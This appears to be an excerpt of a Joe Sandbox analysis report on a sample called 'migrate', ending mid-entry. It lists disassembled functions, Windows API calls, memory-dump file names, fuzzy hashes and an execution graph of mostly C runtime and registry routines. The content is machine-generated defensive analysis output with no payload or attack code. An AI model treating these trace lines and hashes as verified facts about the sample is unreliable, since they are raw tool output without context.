                                                                                                                                                                                                    Function 0012E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualQuery.KERNEL32(80000000,0012E5E8,0000001C,0012E7DD,00000000,?,?,?,?,?,?,?,0012E5E8,00000004,00171CEC,0012E86D), ref: 0012E6B4
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0012E5E8,00000004,00171CEC,0012E86D), ref: 0012E6CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                                                                                                    • Opcode ID: afd7b290c6a7fbe869775cf9e42c1d7b1f2bb52f0640e53ba9390497ea21646b
                                                                                                                                                                                                    • Instruction ID: ddb662b921165f3f2b2286ceeddc88ff727bc858db3ed5fe7e298daa088eed1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: afd7b290c6a7fbe869775cf9e42c1d7b1f2bb52f0640e53ba9390497ea21646b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7901F736A001196BDB14DE29DC09BDD7BEAAFC4324F0CC120ED19D7150D734D9558680
                                                                                                                                                                                                    Function 00111316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: _swprintf.LIBCMT ref: 0011E30E
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: _strlen.LIBCMT ref: 0011E32F
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: SetDlgItemTextW.USER32(?,0014E274,?), ref: 0011E38F
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: GetWindowRect.USER32(?,?), ref: 0011E3C9
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: GetClientRect.USER32(?,?), ref: 0011E3D5
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                                                                                                    • Opcode ID: f9e873468616ed9c92bfcdf97761013e817041d814f63f6f5e416dacc23ccc97
                                                                                                                                                                                                    • Instruction ID: 2853d00df38d47b39b2f2dfc0db7ab2aa31ed9424468bb59b3ca099dfd7d6255
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e873468616ed9c92bfcdf97761013e817041d814f63f6f5e416dacc23ccc97
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F04430114288B6DF1D1F508C1D7EA7BA9BF54355F044234FE68559E9CB74C9D4EA50
                                                                                                                                                                                                    Function 00120FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00121101,?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FEA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FF6
                                                                                                                                                                                                      • Part of subcall function 00116C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00116C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00120FFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                                                                                    • Opcode ID: ff19ac6474ac048b15fc7dea127d296e95e55776a5d8b190564351512dfa05cb
                                                                                                                                                                                                    • Instruction ID: 6de4ae774ecfe78b37b8e65ff6bf878589a55ea9226f1d6d2d3ae4fadb7093f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff19ac6474ac048b15fc7dea127d296e95e55776a5d8b190564351512dfa05cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19D02E725085307BC6203324AC0AEAE3814AB32732B200724F038662F2CB220AC192E2
                                                                                                                                                                                                    Function 0011E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0011DA55,?), ref: 0011E2A3
                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0011DA55,?), ref: 0011E2B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                                                                                                    • String ID: RTL
                                                                                                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                                                                                                    • Opcode ID: 603360fd74d3a0a58af4b557cca17a642f4709fb52f753429f51bbb9896ee4f8
                                                                                                                                                                                                    • Instruction ID: 63c48eb3351fe16761d271ae866a5e250da2c9a2bb9ca770c2037d22c2fff25f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 603360fd74d3a0a58af4b557cca17a642f4709fb52f753429f51bbb9896ee4f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53C0123128071066EB382BA46C0DF836A985B02B91F290558B691EB6E1DBA6C9C086A0

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:5.7%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:0.1%
                                                                                                                                                                                                    Total number of Nodes:735
                                                                                                                                                                                                    Total number of Limit Nodes:45
                                                                                                                                                                                                    execution_graph 15252 1400250ee 15261 140019a9c 15252->15261 15254 14001c6a8 _getptd 45 API calls 15255 140025156 15254->15255 15256 14001c6a8 _getptd 45 API calls 15255->15256 15257 140025169 15256->15257 15260 140025143 __CxxFrameHandler 15260->15254 15262 14001c6a8 _getptd 45 API calls 15261->15262 15263 140019aae 15262->15263 15264 140019abc 15263->15264 15276 14001e118 DecodePointer 15263->15276 15266 14001c6a8 _getptd 45 API calls 15264->15266 15268 140019ac1 15266->15268 15267 140019ad8 15270 14001e118 __CxxFrameHandler 50 API calls 15267->15270 15268->15267 15269 140019ae8 15268->15269 15271 14001c6a8 _getptd 45 API calls 15269->15271 15272 140019add 15270->15272 15271->15272 15272->15260 15273 140019a68 15272->15273 15274 14001c6a8 _getptd 45 API calls 15273->15274 15275 140019a76 15274->15275 15275->15260 15277 14001e12d 15276->15277 15280 14001e0f4 15277->15280 15281 14001c6a8 _getptd 45 API calls 15280->15281 15282 14001e0fd 15281->15282 15285 140023d20 15282->15285 15286 140023d30 15285->15286 15288 140023d3a __CxxFrameHandler 15285->15288 15287 14001dbb8 malloc 45 API calls 15286->15287 15287->15288 15289 140023d4e 15288->15289 15295 14001e358 15288->15295 15291 140023d57 RtlCaptureContext 15289->15291 15292 140023db6 __CxxFrameHandler 15289->15292 15293 140018830 __initmbctable 15291->15293 15294 140023d77 SetUnhandledExceptionFilter UnhandledExceptionFilter 15293->15294 15294->15292 15296 14001e384 15295->15296 15297 14001e3de DecodePointer 15295->15297 15296->15297 15299 14001e42f 15296->15299 15301 14001e3a8 15296->15301 15302 14001e434 __CxxFrameHandler 15297->15302 15300 14001c624 _errno 45 API calls 15299->15300 15300->15302 15301->15297 15304 14001e3b7 15301->15304 15303 14001a91c _lock 45 API calls 15302->15303 15306 14001e4d3 15302->15306 15312 14001e3d6 15302->15312 15303->15306 15305 14001b8bc _errno 45 API calls 15304->15305 15307 14001e3bc 15305->15307 15310 14001e525 15306->15310 15313 14001c534 EncodePointer 15306->15313 15308 14001b7ec _FF_MSGBANNER 7 API calls 15307->15308 15308->15312 15310->15312 15314 14001a81c LeaveCriticalSection 15310->15314 15312->15289 15627 140014c20 15628 140014c73 write_char 15627->15628 15629 140014c63 15627->15629 15632 1400026b0 85 API calls 15628->15632 15629->15628 15630 140014cb4 15629->15630 15631 140018170 _snwprintf_s 77 API calls 15630->15631 15633 140014cdb 15631->15633 15634 140014c89 15632->15634 15635 140018170 _snwprintf_s 77 API calls 15633->15635 15638 140018800 write_char 8 API calls 15634->15638 15636 140014d08 15635->15636 15637 140006b30 94 API calls 15636->15637 15640 140014d1d 15637->15640 15639 140014c9c 15638->15639 15640->15634 15642 14000d020 15640->15642 15643 140018170 _snwprintf_s 77 API calls 15642->15643 15644 14000d074 15643->15644 15645 14000d0a8 15644->15645 15646 14000d078 15644->15646 15647 14000d11b 15645->15647 15649 14000cd00 89 API calls 15645->15649 15648 1400025f0 3 API calls 15646->15648 15650 14000cd20 89 API calls 15647->15650 15654 14000d0a1 15648->15654 15651 14000d0db 15649->15651 15652 14000d12e 15650->15652 15653 14000d0e3 RegQueryValueExW RegCloseKey 15651->15653 15651->15654 15652->15654 15657 14000d154 15652->15657 15658 14000d16a RegDeleteValueW 15652->15658 15653->15647 15653->15654 15655 140018800 write_char 8 API calls 15654->15655 15656 14000d1a4 15655->15656 15656->15634 15659 14000bfc0 88 API calls 15657->15659 15660 14000d17a 15658->15660 15662 14000d166 15659->15662 15661 14000d181 RegCloseKey 15660->15661 15661->15654 15662->15661 14940 14000d020 14941 140018170 _snwprintf_s 77 API calls 14940->14941 14942 14000d074 14941->14942 14943 14000d0a8 14942->14943 14944 14000d078 14942->14944 14945 14000d11b 14943->14945 14947 14000cd00 89 API calls 14943->14947 14946 1400025f0 3 API calls 14944->14946 14948 14000cd20 89 API calls 14945->14948 14952 14000d0a1 14946->14952 14949 14000d0db 14947->14949 14950 14000d12e 14948->14950 14951 14000d0e3 RegQueryValueExW RegCloseKey 14949->14951 14949->14952 14950->14952 14955 14000d154 14950->14955 14956 14000d16a RegDeleteValueW 14950->14956 14951->14945 14951->14952 14953 140018800 write_char 8 API calls 14952->14953 14954 14000d1a4 14953->14954 14961 14000bfc0 RegSetValueExW 14955->14961 14958 14000d17a 14956->14958 14959 14000d181 RegCloseKey 14958->14959 14959->14952 14960 14000d166 14960->14959 14962 14000c017 GetLastError 14961->14962 14963 14000c00c 14961->14963 14964 140002430 83 API calls 14962->14964 14963->14960 14965 14000c024 14964->14965 14966 1400025f0 3 API calls 14965->14966 14967 14000c045 14966->14967 14967->14960 16058 140024e2d 16061 14001a81c LeaveCriticalSection 16058->16061 16111 140018038 16116 14001a700 16111->16116 16117 14001a60c 16116->16117 16118 14001a91c _lock 45 API calls 16117->16118 16124 14001a635 16118->16124 16119 14001a6d2 16145 14001a81c LeaveCriticalSection 16119->16145 16122 1400180c0 46 API calls 16122->16124 16123 140018148 2 API calls 16123->16124 16124->16119 16124->16122 16124->16123 16135 14001a5c4 16124->16135 16136 14001a5d2 16135->16136 16137 14001a5d9 16135->16137 16146 14001a60c 16136->16146 16139 14001a548 _flush 77 API calls 16137->16139 16140 14001a5de 16139->16140 16141 140019e0c _flush 45 API calls 16140->16141 16144 14001a5d7 16140->16144 16142 14001a5f6 16141->16142 16155 1400212c0 16142->16155 16144->16124 16147 14001a91c _lock 45 API calls 16146->16147 16153 14001a635 16147->16153 16148 14001a6d2 16181 14001a81c LeaveCriticalSection 16148->16181 16151 1400180c0 46 API calls 16151->16153 16152 140018148 2 API calls 16152->16153 16153->16148 16153->16151 16153->16152 16154 14001a5c4 81 API calls 16153->16154 16154->16153 16156 1400212ec 16155->16156 16157 1400212d9 16155->16157 16159 1400213a2 16156->16159 16162 140021300 16156->16162 16158 14001b8bc _errno 45 API calls 16157->16158 16161 1400212de 16158->16161 16160 14001b8bc _errno 45 API calls 16159->16160 16163 1400213a7 16160->16163 16161->16144 16164 140021326 16162->16164 16165 14002134b 16162->16165 16167 14001b7ec _FF_MSGBANNER 7 API calls 16163->16167 16168 14001b8bc _errno 45 API calls 16164->16168 16166 14002006c _flush 46 API calls 16165->16166 16169 140021352 16166->16169 16167->16161 16170 14002132b 16168->16170 16172 14001ffe8 _close_nolock 45 API calls 16169->16172 16180 140021387 16169->16180 16171 14001b7ec _FF_MSGBANNER 7 API calls 16170->16171 16171->16161 16174 140021365 FlushFileBuffers 16172->16174 16173 14001b8bc _errno 45 API calls 16175 14002138e 16173->16175 16176 140021372 GetLastError 16174->16176 16178 14002137c 16174->16178 16182 140020114 LeaveCriticalSection 16175->16182 16176->16178 16178->16175 16179 14001b8dc __doserrno 45 API calls 16178->16179 16179->16180 16180->16173 12130 140019e44 12131 140019e5c 12130->12131 12170 1400205ec HeapCreate 12131->12170 12134 140019eea 12173 14001c804 12134->12173 12136 140019ed1 12372 14001dde0 12136->12372 12137 140019ed6 12381 14001dbb8 12137->12381 12171 140019ec4 12170->12171 12172 140020610 HeapSetInformation 12170->12172 12171->12134 12171->12136 12171->12137 12172->12171 12422 14001915c 12173->12422 12175 14001c80f 12427 14001a70c 12175->12427 12178 14001c878 12445 14001c548 12178->12445 12179 14001c818 FlsAlloc 12179->12178 12180 14001c830 12179->12180 12431 14001a34c 12180->12431 12185 14001c847 FlsSetValue 12185->12178 12186 14001c85a 12185->12186 12436 14001c570 12186->12436 14863 140023c7c 12372->14863 12375 14001ddfd 12376 14001dbb8 malloc 45 API calls 12375->12376 12379 14001de1e 12375->12379 12378 14001de14 12376->12378 12377 140023c7c _FF_MSGBANNER 45 API calls 12377->12375 12380 14001dbb8 malloc 45 API calls 12378->12380 12379->12137 12380->12379 12382 14001dbdb 12381->12382 12383 140023c7c _FF_MSGBANNER 42 API calls 12382->12383 12413 140019ee0 12382->12413 12384 14001dbfd 12383->12384 12385 14001dd82 GetStdHandle 12384->12385 12386 140023c7c _FF_MSGBANNER 42 API calls 12384->12386 12387 14001dd95 malloc 12385->12387 12385->12413 12388 14001dc10 12386->12388 12390 14001ddab WriteFile 12387->12390 12387->12413 12388->12385 12389 14001dc21 12388->12389 12389->12413 14869 140022840 12389->14869 12390->12413 12393 14001dc65 GetModuleFileNameA 12395 14001dcb6 malloc 12393->12395 12396 14001dc85 12393->12396 12394 14001b6c4 malloc 6 API calls 12394->12393 12398 14001dd11 12395->12398 14878 140022768 12395->14878 12397 140022840 malloc 42 API calls 12396->12397 12399 14001dc9d 12397->12399 14887 1400226dc 12398->14887 12399->12395 12401 14001b6c4 malloc 6 API calls 12399->12401 12401->12395 12404 14001dd3c 12405 1400226dc malloc 42 API calls 12404->12405 12408 14001dd52 12405->12408 12407 14001b6c4 malloc 6 API calls 12407->12404 12409 14001dd6b 12408->12409 12411 14001b6c4 malloc 6 API calls 12408->12411 14896 140023a88 12409->14896 12410 14001b6c4 malloc 6 API calls 12410->12398 12411->12409 12414 140018e48 12413->12414 14914 140018e0c GetModuleHandleW 12414->14914 12448 14001c534 EncodePointer 12422->12448 12424 140019167 _initp_misc_winsig 12425 14001e13c EncodePointer 12424->12425 12426 1400191aa EncodePointer 12425->12426 12426->12175 12429 14001a72f 12427->12429 12430 14001a76c 12429->12430 12449 14001e5e4 InitializeCriticalSectionAndSpinCount 12429->12449 12430->12178 12430->12179 12432 14001a371 12431->12432 12434 14001a3b1 12432->12434 12435 14001a38f Sleep 12432->12435 12451 1400207a4 12432->12451 12434->12178 12434->12185 12435->12432 12435->12434 12494 14001a91c 12436->12494 12446 14001c564 12445->12446 12447 14001c557 FlsFree 12445->12447 12447->12446 12450 14001e611 12449->12450 12450->12429 12452 1400207b9 12451->12452 12458 1400207eb malloc 12451->12458 12453 1400207c7 12452->12453 12452->12458 12460 14001b8bc 12453->12460 12455 140020803 HeapAlloc 12457 1400207e7 12455->12457 12455->12458 12457->12432 12458->12455 12458->12457 12467 14001c624 GetLastError FlsGetValue 12460->12467 12462 14001b8c5 12463 14001b7ec DecodePointer 12462->12463 12464 14001b837 _FF_MSGBANNER 12463->12464 12465 14001b81d 12463->12465 12485 14001b6c4 12464->12485 12465->12457 12468 14001c692 SetLastError 12467->12468 12469 14001c64a 12467->12469 12468->12462 12470 14001a34c _errno 40 API calls 12469->12470 12471 14001c657 12470->12471 12471->12468 12472 14001c65f FlsSetValue 12471->12472 12473 14001c675 12472->12473 12474 14001c68b 12472->12474 12475 14001c570 _errno 40 API calls 12473->12475 12479 14001a458 12474->12479 12478 14001c67c GetCurrentThreadId 12475->12478 12477 14001c690 12477->12468 12478->12468 12480 14001a45d HeapFree 12479->12480 12482 14001a48d free 12479->12482 12481 14001a478 12480->12481 12480->12482 12483 14001b8bc _errno 43 API calls 12481->12483 12482->12477 12484 14001a47d GetLastError 12483->12484 12484->12482 12492 140018830 12485->12492 12487 14001b6e4 RtlCaptureContext 12488 14001b721 12487->12488 12489 14001b781 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12488->12489 12490 14001b7cc GetCurrentProcess TerminateProcess 12489->12490 12491 14001b7c0 _FF_MSGBANNER 12489->12491 12490->12465 12491->12490 12493 140018839 12492->12493 12493->12487 12493->12493 12495 14001a93a 12494->12495 12496 14001a94b EnterCriticalSection 12494->12496 12500 14001a834 12495->12500 12499 140018ddc _lock 44 API calls 12499->12496 12501 14001a872 12500->12501 12502 14001a85b 12500->12502 12504 14001a887 12501->12504 12526 14001a2e0 12501->12526 12503 14001dde0 _FF_MSGBANNER 44 API calls 12502->12503 12505 14001a860 12503->12505 12504->12496 12504->12499 12507 14001dbb8 malloc 44 API calls 12505->12507 12509 14001a868 12507->12509 12514 140018e48 malloc 3 API calls 12509->12514 12510 14001a8ac 12513 14001a91c _lock 44 API calls 12510->12513 12511 14001a89d 12512 14001b8bc _errno 44 API calls 12511->12512 12512->12504 12515 14001a8b6 12513->12515 12514->12501 12516 14001a8ee 12515->12516 12517 14001a8bf 12515->12517 12519 14001a458 free 44 API calls 12516->12519 12518 14001e5e4 _lock InitializeCriticalSectionAndSpinCount 12517->12518 12520 14001a8cc 12518->12520 12525 14001a8dd LeaveCriticalSection 12519->12525 12522 14001a458 free 44 API calls 12520->12522 12520->12525 12523 14001a8d8 12522->12523 12524 14001b8bc _errno 44 API calls 12523->12524 12524->12525 12525->12504 12527 14001a2fc 12526->12527 12529 14001a334 12527->12529 12530 14001a314 Sleep 12527->12530 12531 1400206ec 12527->12531 12529->12510 12529->12511 12530->12527 12530->12529 12532 140020704 malloc 12531->12532 12533 140020780 malloc 12531->12533 12534 14002073c HeapAlloc 12532->12534 12535 14002071c 12532->12535 12539 140020765 12532->12539 12542 14002076a 12532->12542 12537 14001b8bc _errno 44 API calls 12533->12537 12534->12532 12538 140020775 12534->12538 12535->12534 12536 14001dde0 _FF_MSGBANNER 44 API calls 12535->12536 12541 14001dbb8 malloc 44 API calls 12535->12541 12543 140018e48 malloc 3 API calls 12535->12543 12536->12535 12537->12538 12538->12527 12540 14001b8bc _errno 44 API calls 12539->12540 12540->12542 12541->12535 12544 14001b8bc _errno 44 API calls 12542->12544 12543->12535 12544->12538 14864 140023c84 14863->14864 14865 14001ddee 14864->14865 14866 14001b8bc _errno 45 API calls 14864->14866 14865->12375 14865->12377 14867 140023ca9 14866->14867 14868 14001b7ec _FF_MSGBANNER 7 API calls 14867->14868 14868->14865 14870 140022855 14869->14870 14871 14002284b 14869->14871 14872 14001b8bc _errno 45 API calls 14870->14872 14871->14870 14876 140022881 14871->14876 14873 14002285d 14872->14873 14874 14001b7ec _FF_MSGBANNER 7 API calls 14873->14874 14875 14001dc4c 14874->14875 14875->12393 14875->12394 14876->14875 14877 14001b8bc _errno 45 API calls 14876->14877 14877->14873 14879 140022776 14878->14879 14882 14002277b 14879->14882 14884 14001dcf8 14879->14884 14885 1400227c9 14879->14885 14880 14001b8bc _errno 45 API calls 14881 1400227a5 14880->14881 14883 14001b7ec _FF_MSGBANNER 7 API calls 14881->14883 14882->14880 14882->14884 14883->14884 14884->12398 14884->12410 14885->14884 14886 14001b8bc _errno 45 API calls 14885->14886 14886->14881 14888 1400226f4 14887->14888 14890 1400226ea 14887->14890 14889 14001b8bc _errno 45 API calls 14888->14889 14895 1400226fc 14889->14895 14890->14888 14893 140022738 14890->14893 14891 14001b7ec _FF_MSGBANNER 7 API calls 14892 14001dd23 14891->14892 14892->12404 14892->12407 14893->14892 14894 14001b8bc _errno 45 API calls 14893->14894 14894->14895 14895->14891 14913 14001c534 EncodePointer 14896->14913 14915 140018e26 GetProcAddress 14914->14915 14916 140018e3f ExitProcess 14914->14916 14915->14916 14917 140018e3b 14915->14917 14917->14916 16830 14001c178 16831 14001c185 16830->16831 16832 14001c18f 16830->16832 16834 14001bf80 16831->16834 16835 14001c6a8 _getptd 45 API calls 16834->16835 16836 14001bfa4 16835->16836 16837 14001bbbc __initmbctable 45 API calls 16836->16837 16838 14001bfac 16837->16838 16858 14001bc78 16838->16858 16841 14001a2e0 _getbuf 45 API calls 16842 14001bfd0 __initmbctable 16841->16842 16857 14001c12d 16842->16857 16865 14001bd08 16842->16865 16845 14001c00b 16849 14001a458 free 45 API calls 16845->16849 16851 14001c030 16845->16851 16846 14001c12f 16847 14001c148 16846->16847 16850 14001a458 free 45 API calls 16846->16850 16846->16857 16848 14001b8bc _errno 45 API calls 16847->16848 16848->16857 16849->16851 16850->16847 16852 14001a91c _lock 45 API calls 16851->16852 16851->16857 16853 14001c068 16852->16853 16854 14001c118 16853->16854 16856 14001a458 free 45 API calls 16853->16856 16875 14001a81c LeaveCriticalSection 16854->16875 16856->16854 16857->16832 16859 140018564 _wcstoui64 45 API calls 16858->16859 16860 14001bc8c 16859->16860 16861 14001bc98 GetOEMCP 16860->16861 16862 14001bcbd 16860->16862 16864 14001bca8 16861->16864 16863 14001bcc2 GetACP 16862->16863 16862->16864 16863->16864 16864->16841 16864->16857 16866 14001bc78 __initmbctable 47 API calls 16865->16866 16867 14001bd2f 16866->16867 16868 14001bd37 __initmbctable 16867->16868 16869 14001bd88 IsValidCodePage 16867->16869 16874 14001bdae __initmbctable 16867->16874 16870 140018800 write_char 8 API calls 16868->16870 16869->16868 16871 14001bd99 GetCPInfo 16869->16871 16872 14001bf6b 16870->16872 16871->16868 16871->16874 16872->16845 16872->16846 16876 14001b9d8 GetCPInfo 16874->16876 16877 14001bb06 16876->16877 16878 14001ba1a __initmbctable 16876->16878 16881 140018800 write_char 8 API calls 16877->16881 16879 140022384 __initmbctable 67 API calls 16878->16879 16880 14001ba9d 16879->16880 16886 140022080 16880->16886 16883 14001bba6 16881->16883 16883->16868 16885 140022080 __initmbctable 78 API calls 16885->16877 16887 140018564 _wcstoui64 45 API calls 16886->16887 16888 1400220a4 16887->16888 16891 140021b40 16888->16891 16892 140021b98 LCMapStringW 16891->16892 16896 140021bbc 16891->16896 16893 140021bc8 GetLastError 16892->16893 16892->16896 16893->16896 16894 140021e8a 16899 1400245e8 __initmbctable 67 API calls 16894->16899 16895 140021c37 16897 140021e83 16895->16897 16898 140021c55 MultiByteToWideChar 16895->16898 16896->16894 16896->16895 16900 140018800 write_char 8 API calls 16897->16900 16898->16897 16909 140021c84 16898->16909 16901 140021eb8 16899->16901 16902 14001bad0 16900->16902 16901->16897 16903 140022013 LCMapStringA 16901->16903 16904 140021ed7 16901->16904 16902->16885 16920 140021f1f 16903->16920 16906 14002463c __initmbctable 60 API calls 16904->16906 16905 140021d00 MultiByteToWideChar 16907 140021e75 16905->16907 16908 140021d2a LCMapStringW 16905->16908 16911 140021eef 16906->16911 16907->16897 16916 14001a458 free 45 API calls 16907->16916 16908->16907 16912 140021d54 16908->16912 16910 1400206ec malloc 45 API calls 16909->16910 16913 140021cb5 _flush 16909->16913 16910->16913 16911->16897 16914 140021ef7 LCMapStringA 16911->16914 16917 140021d5f 16912->16917 16923 140021d9a 16912->16923 16913->16897 16913->16905 16914->16920 16925 140021f26 16914->16925 16915 140022043 16915->16897 16921 14001a458 free 45 API calls 16915->16921 16916->16897 16917->16907 16919 140021d76 LCMapStringW 16917->16919 16918 14001a458 free 45 API calls 16918->16915 16919->16907 16920->16915 16920->16918 16921->16897 16922 140021e07 LCMapStringW 16926 140021e67 16922->16926 16927 140021e28 WideCharToMultiByte 16922->16927 16924 1400206ec malloc 45 API calls 16923->16924 16933 140021db8 _flush 16923->16933 16924->16933 16928 1400206ec malloc 45 API calls 16925->16928 16930 140021f47 __initmbctable _flush 16925->16930 16926->16907 16932 14001a458 free 45 API calls 16926->16932 16927->16926 16928->16930 16929 140021fa9 LCMapStringA 16934 140021fd1 16929->16934 16935 140021fd5 16929->16935 16930->16920 16930->16929 16932->16907 16933->16907 16933->16922 16934->16920 16937 14001a458 free 45 API calls 16934->16937 16936 14002463c __initmbctable 60 API calls 16935->16936 16936->16934 16937->16920 16993 14001977c 16994 14001c6a8 _getptd 45 API calls 16993->16994 16995 14001979e 16994->16995 16996 14001c6a8 _getptd 45 API calls 16995->16996 16997 1400197ae 16996->16997 16998 14001c6a8 _getptd 45 API calls 16997->16998 16999 1400197be 16998->16999 17002 14001fd14 16999->17002 17003 14001c6a8 _getptd 45 API calls 17002->17003 17004 